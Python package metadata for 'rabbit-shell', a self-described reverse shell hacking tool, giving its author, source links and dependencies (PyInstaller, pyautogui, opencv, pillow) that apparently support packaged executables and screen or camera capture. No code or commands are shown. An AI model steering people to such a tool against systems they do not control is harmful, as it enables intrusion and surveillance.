Metadata-Version: 2.1
Name: rabbit-shell
Version: 3.3.3
Summary: Rabbit shell reverse shell tool.
Home-page: https://github.com/greedalbadi/rabbit-shell
Author: greed albadi
Author-email: greedalbadi@gmail.com
License: MIT
Project-URL: Source, https://github.com/greedalbadi/rabbit-shell
Project-URL: Report Bugs, https://github.com/greedalbadi/rabbit-shell/issues
Project-URL: Documentation, https://github.com/greedalbadi/rabbit-shell/blob/dev/README.md
Keywords: python,shell,networking,server,reverse-shell,tool,hacking,cyber
Platform: UNKNOWN
License-File: LICENSE
Requires-Dist: prettytable
Requires-Dist: colorama
Requires-Dist: PyInstaller
Requires-Dist: numpy
Requires-Dist: pyautogui
Requires-Dist: opencv-python (==4.5.3.56)
Requires-Dist: pillow
